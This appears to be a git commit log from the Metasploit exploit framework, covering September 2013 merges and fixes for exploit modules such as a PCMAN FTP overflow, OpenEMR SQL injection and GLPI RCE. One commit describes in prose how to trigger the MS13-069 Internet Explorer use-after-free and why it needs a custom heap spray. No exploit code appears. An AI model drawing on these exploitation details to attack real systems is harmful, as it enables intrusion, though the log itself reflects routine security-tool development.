jvazquez-r7 59a201a8d3 Land #2334, @tkrpata and @jvennix-r7's patch for sudo_password_bypass 2013-09-20 17:01:19 -05:00
jvazquez-r7 fb8d0dc887 Write the return 2013-09-20 17:00:07 -05:00
Meatballs 6e69fe48bf Undo psexec changes 2013-09-20 22:30:00 +01:00
Meatballs 2591be503b Psh support 2013-09-20 22:07:42 +01:00
Meatballs 15885e4ef6 Change static x value 2013-09-20 20:31:14 +01:00
Meatballs ee365a6b64 Some liberal sleeping 2013-09-20 19:33:27 +01:00
jvazquez-r7 29649b9a04 Land #2388, @dummys's exploit for CVE-2013-5696 2013-09-20 13:03:01 -05:00
jvazquez-r7 8922d0fc7f Fix small bugs on glpi_install_rce 2013-09-20 13:01:41 -05:00
jvazquez-r7 b24ae6e80c Clean glpi_install_rce 2013-09-20 12:58:23 -05:00
Meatballs 7d1c5c732a Correct powershell 2013-09-20 18:36:24 +01:00
sinn3r bb7b57cad9 Land #2370 - PCMAN FTP Server post-auth stack buffer overflow 2013-09-20 12:29:10 -05:00
sinn3r feb76ea767 Modify check
Since auth is required, check function needs to look into that too
2013-09-20 12:28:21 -05:00
sinn3r 2d6c76d0ad Rename pcman module
Because this is clearly a msf module, we don't need 'msf' as a
filename. The shorter the better.
2013-09-20 12:18:24 -05:00
sinn3r 6690e35761 Account for username length
Username is part of the overflowing string, need to account for that
2013-09-20 12:17:34 -05:00
sinn3r 9d67cbb4db Retabbed 2013-09-20 11:58:53 -05:00
Meatballs 9819566d94 Nearly 2013-09-20 17:18:14 +01:00
sinn3r 85152c4281 Land #2400 - Add OSVDB reference for openemr_sqli_privesc_upload 2013-09-20 10:39:06 -05:00
jvazquez-r7 6f5e528699 Remove author, all the credits go to corelanc0der and sinn3r 2013-09-20 10:27:37 -05:00
sinn3r 83f54d71ea Add MS13-069 (CVE-2013-3205) IE ccaret object use-after-free
This module exploits a use-after-free vulnerability found in Internet Explorer,
specifically in how the browser handles the caret (text cursor) object. In IE's
standards mode, the caret handling's vulnerable state can be triggered by first
setting up an editable page with an input field, and then we can force the caret
to update in an onbeforeeditfocus event by setting the body's innerHTML property.
In this event handler, mshtml!CCaret::`vftable' can be freed using a document.write()
function, however, mshtml!CCaret::UpdateScreenCaret remains unaware aware of this
change, and still uses the same reference to the CCaret object. When the function
tries to use this invalid reference to call a virtual function at offset 0x2c, it
finally results a crash. Precise control of the freed object allows arbitrary code
execution under the context of the user.

The vuln works against IE8 on Win 7, but the current version of the custom spray
doesn't actually work well against that target. More work is needed before we can
add that target for sure.  The reason a custom spray is needed is because the
document.write() function erases the typical spray routines we use like
js_property_spray, or the heaplib + substring one.  Tried using an iframe too,
but onbeforeeditfocus event doesn't seem to work well in an iframe (does not
fire when innerHTML is used.)
2013-09-20 10:20:35 -05:00
jvazquez-r7 bad6f2279d Add OSVDB reference for openemr_sqli_privesc_upload 2013-09-20 09:41:23 -05:00
Meatballs a00f3d8b8e initial 2013-09-20 13:40:28 +01:00
dummys 032b9115a0 removed the old exploit 2013-09-20 10:53:52 +02:00
dummys 187ab16467 many change in the code and replace at the correct place the module 2013-09-20 10:45:10 +02:00
Rick Flores (nanotechz9l) 7d17eef7a7 Updated several msftidy [WARNING] Spaces at EOL issues. 2013-09-19 20:35:08 -07:00
sinn3r 955365d605 Land #2391 - MS13-071 Microsoft Windows Theme File Handling Vulnerability 2013-09-19 22:21:09 -05:00
sinn3r 0eb838156b Land #2390 - Use payload.encoded because BadChars are defined 2013-09-19 22:10:55 -05:00
sinn3r 9598853fee Land #2389 - Fix use of Rex sockets from dlink modules 2013-09-19 22:09:53 -05:00
sinn3r 8d70a9d893 Add more refs 2013-09-19 22:05:23 -05:00
Joe Vennix 137b3bc6ea Fix whitespace issues. 2013-09-19 17:29:11 -05:00
Joe Vennix bd96c6c093 Adds module for CVE-2013-3568. 2013-09-19 17:26:30 -05:00
jvazquez-r7 46a241b168 Fix my own cleanup 2013-09-19 14:51:22 -05:00
dummys 08c7b49be0 corrected too much if 2013-09-19 21:47:01 +02:00
jvazquez-r7 31903be393 Land #2380, @xistence exploit for EDB 28329 2013-09-19 14:42:27 -05:00
jvazquez-r7 cb737525b1 Final cleanup for openemr_sqli_privesc_upload 2013-09-19 14:40:57 -05:00
jvazquez-r7 76e170513d Do first clean on openemr_sqli_privesc_upload 2013-09-19 14:36:25 -05:00
jvazquez-r7 cf0375f7e6 Fix check return value 2013-09-19 14:17:45 -05:00
dummys 862a8fb8aa corrected indentation bug again 2013-09-19 20:27:23 +02:00
jvazquez-r7 9b486e1dbb Add comment about the smb_* methods 2013-09-19 13:23:46 -05:00
dummys ce8e94b5fe corrected indentation bug 2013-09-19 20:14:07 +02:00
jvazquez-r7 bf0f4a523f Land #2381, @xistence exploit for EDB 28330 2013-09-19 13:06:41 -05:00
jvazquez-r7 c63423ad69 Update code comment 2013-09-19 13:03:55 -05:00
jvazquez-r7 6073e6f2dc Fix use of normalize_uri 2013-09-19 12:59:37 -05:00
jvazquez-r7 b4fa535f2b Fix usage of fail_with 2013-09-19 12:45:29 -05:00
jvazquez-r7 1aba7550f9 Fix check indentation 2013-09-19 12:44:11 -05:00
jvazquez-r7 1f7c3d82c1 Refactor easy methods 2013-09-19 12:42:38 -05:00
jvazquez-r7 891a54aad7 Fix metadata 2013-09-19 12:41:13 -05:00
jvazquez-r7 1a00cce8a9 Clean up 2013-09-19 11:51:07 -05:00
William Vu 628cfe8e67 Land #2393, tape_engine_8A filename disambiguation 2013-09-19 10:31:40 -05:00
Tod Beardsley ef72b30074 Include the post requires until #2354 lands
Another one that needs the manual require. See #2354
2013-09-19 09:47:01 -05:00
Tod Beardsley fb72e7f02a Disambiguate tape_engine_8A as tape_engine_0x8a
This will reopen #2358 to avoid filename collisions on Windows, Rubymine
environments, etc.
2013-09-19 09:35:31 -05:00
Rick Flores (nanotechz9l) 058e0fdd80 Changed ret to push esp C:\WINDOWS\system32\msvcrt.dll 2013-09-19 07:21:51 -07:00
dummys f9617e351d corrected Integer() 2013-09-19 16:04:20 +02:00
jvazquez-r7 926ddf35bc Fix possible collisions on binding port and handle rex socket 2013-09-19 08:23:25 -05:00
James Lee 8fe9132159
Land #2358, deprecate funny names 2013-09-18 14:55:33 -05:00
Rick Flores (nanotechz9l) 766e96510d Added minor indentation updates 2013-09-18 12:12:35 -07:00
jvazquez-r7 60d448f600 Add minor cleanup 2013-09-18 14:10:13 -05:00
Rick Flores (nanotechz9l) db8881966e Merge remote-tracking branch 'upstream/master' 2013-09-18 12:02:01 -07:00